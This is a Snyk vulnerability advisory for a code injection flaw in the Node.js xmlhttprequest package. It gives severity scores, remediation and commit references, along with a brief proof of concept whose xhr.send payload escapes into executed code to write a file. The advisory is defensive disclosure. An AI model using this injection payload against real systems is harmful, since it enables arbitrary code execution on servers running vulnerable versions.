SNYK-JS-XMLHTTPREQUEST-1082935

SNYK-JS-XMLHTTPREQUEST-1082935 PUBLISHED CVSS 8.100000381469727 HIGH

## Overview [xmlhttprequest](https://github.com/driverdan/node-XMLHttpRequest) is a wrapper for the built-in http client to emulate the browser XMLHttpRequest object. Affected versions of this package are vulnerable to Arbitrary Code Injection. Provided requests are sent synchronously (`async=False` on `xhr.open`), malicious user input flowing into `xhr.send` could result in arbitrary code being injected and run. ### POC ``` const { XMLHttpRequest } = require("xmlhttprequest") const xhr = new XMLHttpRequest() xhr.open("POST", "http://localhost.invalid/", false /* use synchronize request */) xhr.send("\\');require(\"fs\").writeFileSync(\"/tmp/aaaaa.txt\", \"poc-20210306\");req.end();//") ``` ## Remediation Upgrade `xmlhttprequest` to version 1.7.0 or higher. ## References - [GitHub Commit #1](https://github.com/driverdan/node-XMLHttpRequest/commit/983cfc244c7567ad6a59e366e55a8037e0497fe6) - [GitHub Commit #2](https://github.com/mjwwit/node-XMLHttpRequest/commit/ee1e81fc67729c7c0eba5537ed7fe1e30a6b3291) - [Vulnerable Code](https://github.com/driverdan/node-XMLHttpRequest/blob/1.6.0/lib/XMLHttpRequest.js#L480)

Risk Scores

CVSS v3.1

8.100000381469727

CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C

Affected Products

Vendor	Product	Versions
		0

Timeline

Mar 5, 2021 CVE Updated
Mar 5, 2021 CVE Published

References

Open in Interactive Console →